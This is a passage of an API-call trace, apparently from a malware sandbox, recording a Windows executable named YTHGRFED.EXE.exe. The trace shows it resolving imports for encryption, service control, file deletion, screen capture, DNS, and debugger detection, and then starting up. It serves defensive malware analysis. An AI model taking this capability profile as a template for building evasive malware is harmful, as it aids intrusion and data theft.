(hModule=0x76e10000, lpProcName="LocalAlloc") returned 0x76e2168c [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventW") returned 0x76e2183e [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="Process32NextW") returned 0x76e4896c [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatW") returned 0x76e4828e [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="CreateMutexA") returned 0x76e24c6b [0064.382] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableA") returned 0x76e2e331 [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileW") returned 0x76e289b3 [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="LocalFree") returned 0x76e22d3c [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="SetPriorityClass") returned 0x76e3cf28 [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="GetComputerNameW") returned 0x76e2dd0e [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalDrives") returned 0x76e25371 [0064.383] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersion") returned 0x76e24467 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryA") returned 0x76e4d526 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringW") returned 0x76e23bca [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatW") returned 0x76e3f481 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatW") returned 0x76e434d7 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesW") returned 0x76ea425f [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLCID") returned 0x76e23da5 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocale") returned 0x76e3ce46 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoW") returned 0x76e23c42 [0064.384] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreW") returned 0x76e3ca5a [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount") returned 0x76e2110c [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleA") returned 0x76e21245 [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0064.385] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalMemoryStatus") returned 0x76e28b6d [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="FlushConsoleInputBuffer") returned 0x76ec7a9f [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryW") returned 0x76e24259 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileW") returned 0x76e24435 [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleMode") returned 0x76e3a77d [0064.386] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76ec793f [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="PeekConsoleInputA") returned 0x76ec6f0d [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeZoneInformation") returned 0x76e2465a [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0064.387] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleW") returned 0x76ec739a [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="OutputDebugStringW") returned 0x76e4d1d4 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleCtrlHandler") returned 0x76e28a09 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="FatalAppExitA") returned 0x76ea4691 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="GetExitCodeProcess") returned 0x76e3174d [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="AreFileApisANSI") returned 0x76ea40d1 [0064.388] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalFree") returned 0x76e25558 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="SetEndOfFile") returned 0x76e3ce2e [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleInputA") returned 0x76ec6f53 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0064.389] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0064.390] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThread") returned 0x76e217ec [0064.391] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0064.391] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="IsWindow") returned 0x76797136 [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0064.391] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="GetProcessWindowStation") returned 0x76799eea [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0064.392] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0064.393] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxW") returned 0x767efd3f [0064.393] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0064.393] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="CloseServiceHandle") returned 0x754c369c [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameW") returned 0x754c157a [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="ReportEventA") returned 0x754b3ee9 [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="RegisterEventSourceA") returned 0x754c2d46 [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="DeregisterEventSource") returned 0x754c35dd [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="CryptHashData") returned 0x754bdf36 [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0064.393] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="ControlService") returned 0x754d7144 [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="CryptCreateHash") returned 0x754bdf4e [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="CryptImportKey") returned 0x754bc532 [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="QueryServiceStatus") returned 0x754c2a86 [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="RegQueryValueExW") returned 0x754c46ad [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="OpenServiceW") returned 0x754bca4c [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="OpenSCManagerW") returned 0x754bca64 [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0064.394] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetHashParam") returned 0x754bdf7e [0064.394] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0070.812] GetProcAddress (hModule=0x75670000, lpProcName="SHGetPathFromIDListW") returned 0x757017bf [0070.812] GetProcAddress (hModule=0x75670000, lpProcName="SHGetSpecialFolderLocation") returned 0x756fe141 [0070.812] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteA") returned 0x758b7078 [0070.813] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0070.813] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0070.813] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0070.813] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762c0000 [0070.813] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitialize") returned 0x762db636 [0070.814] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitializeSecurity") returned 0x762e7259 [0070.814] GetProcAddress (hModule=0x762c0000, lpProcName="CoUninitialize") returned 0x763086d3 [0070.814] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstance") returned 0x76309d0b [0070.814] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769d0000 [0070.814] GetProcAddress (hModule=0x769d0000, lpProcName=0x6) returned 0x769d3e59 [0070.814] GetProcAddress (hModule=0x769d0000, lpProcName=0x8) returned 0x769d3ed5 [0070.814] GetProcAddress (hModule=0x769d0000, lpProcName=0x9) returned 0x769d3eae [0070.814] GetProcAddress (hModule=0x769d0000, lpProcName=0xc8) returned 0x769d3f21 [0070.815] GetProcAddress (hModule=0x769d0000, lpProcName=0xca) returned 0x769dfd6b [0070.815] GetProcAddress (hModule=0x769d0000, lpProcName=0xc9) returned 0x769d4af8 [0070.815] GetProcAddress (hModule=0x769d0000, lpProcName=0xc) returned 0x769d5dee [0070.815] GetProcAddress (hModule=0x769d0000, lpProcName=0x2) returned 0x769d4642 [0070.815] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74510000 [0072.017] GetProcAddress (hModule=0x74510000, lpProcName="GetAdaptersInfo") returned 0x74519263 [0072.017] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75360000 [0073.441] GetProcAddress (hModule=0x75360000, lpProcName=0xc) returned 0x7536b131 [0073.441] GetProcAddress (hModule=0x75360000, lpProcName=0xb) returned 0x7536311b [0073.441] GetProcAddress (hModule=0x75360000, lpProcName=0x34) returned 0x75377673 [0073.441] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x744b0000 [0074.537] GetProcAddress (hModule=0x744b0000, lpProcName="DnsFree") returned 0x744b436b [0074.537] GetProcAddress (hModule=0x744b0000, lpProcName="DnsQuery_W") returned 0x744c572c [0074.537] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75550000 [0074.538] GetProcAddress (hModule=0x75550000, lpProcName="CryptStringToBinaryA") returned 0x75585d77 [0074.538] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0074.538] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0074.538] GetProcAddress (hModule=0x752d0000, lpProcName="GetObjectA") returned 0x752e85d4 [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="GetDeviceCaps") returned 0x752e4de0 [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="GetBitmapBits") returned 0x752ec155 [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="BitBlt") returned 0x752e5ea6 [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteDC") returned 0x752e58b3 [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="CreateDCA") returned 0x752e7bcc [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleDC") returned 0x752e54f4 [0074.539] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleBitmap") returned 0x752e5f49 [0074.539] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743f0000 [0075.065] GetProcAddress (hModule=0x743f0000, lpProcName="atexit") returned 0x7440c544 [0075.065] atexit (param_1=0x540920) returned 0 [0075.075] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f498 | out: lpSystemTimeAsFileTime=0x18f498*(dwLowDateTime=0x8f4d4820, dwHighDateTime=0x1d5d833)) [0075.075] GetCurrentThreadId () returned 0x54c [0075.075] GetCurrentProcessId () returned 0x734 [0075.075] QueryPerformanceCounter (in: lpPerformanceCount=0x18f490 | out: lpPerformanceCount=0x18f490*=21599308039) returned 1 [0075.157] GetStartupInfoW (in: lpStartupInfo=0x18f428 | out: lpStartupInfo=0x18f428*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76e23519, hStdOutput=0x7733fd35, hStdError=0x773a7daf)) [0075.174] GetProcessHeap () returned 0x6f0000 [0075.284] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e10000 [0075.284] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0075.284] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventExW") returned 0x76ea410b [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreExW") returned 0x76ea4195 [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadStackGuarantee") returned 0x76e2d31f [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolTimer") returned 0x76e3ee7e [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolTimer") returned 0x7736441c [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7738c50e [0075.285] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolTimer") returned 0x7738c381 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolWait") returned 0x76e3f088 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolWait") returned 0x773705d7 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolWait") returned 0x7738ca24 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="FlushProcessWriteBuffers") returned 0x77340b8c [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773ffde8 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessorNumber") returned 0x77391e1d [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalProcessorInformation") returned 0x76ea4761 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSymbolicLinkW") returned 0x76e9cd11 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0075.286] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesEx") returned 0x76ea424f [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringEx") returned 0x76ea46b1 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatEx") returned 0x76eb6676 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoEx") returned 0x76ea4751 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatEx") returned 0x76eb65f1 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocaleName") returned 0x76ea47e1 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentPackageId") returned 0x0 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount64") returned 0x76e3eee0 [0075.287] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0075.288] GetProcAddress (hModule=0x76e10000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0075.288] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3bc) returned 0x70ed80 [0075.288] GetCurrentThreadId () returned 0x54c [0075.296] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x18) returned 0x7001f8 [0075.297] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x800) returned 0x70f148 [0075.297] GetStartupInfoW (in: lpStartupInfo=0x18f3f8 | out: lpStartupInfo=0x18f3f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x89f3db95, hStdError=0x44)) [0075.297] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0075.297] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0075.297] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0075.297] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" " [0075.297] GetEnvironmentStringsW () returned 0x70f950* [0075.467] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xaca) returned 0x710428 [0075.476] FreeEnvironmentStringsW (penv=0x70f950) returned 1 [0075.486] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe")) returned 0x36 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x76) returned 0x701500 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x98) returned 0x710f00 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3e) returned 0x703a88 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x6c) returned 0x70f950 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x6e) returned 0x70f9c8 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x78) returned 0x701580 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x62) returned 0x70fa40 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70aa68 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x706628 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x28) returned 0x70a490 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1a) returned 0x70e8e0 [0075.486] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x4a) returned 0x70fab0 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x72) returned 0x701600 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70aaa0 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70aad8 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1c) returned 0x70e908 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xd2) returned 0x70fb08 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x7c) returned 0x70fbe8 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x710fa0 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3a) returned 0x703ad0 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x90) returned 0x70fc70 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 0x70a4c0 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x30) returned 0x70ab10 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x36) returned 0x70fd08 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x48) returned 0x706678 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x52) returned 0x70fd48 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x703b18 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x82) returned 0x70fda8 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2e) returned 0x70ab48 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x70e930 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2c) returned 0x70ab80 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x70fe38 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x52) returned 0x70fe98 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70abb8 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x3c) returned 0x703b60 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x70fef8 [0075.487] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x24) returned 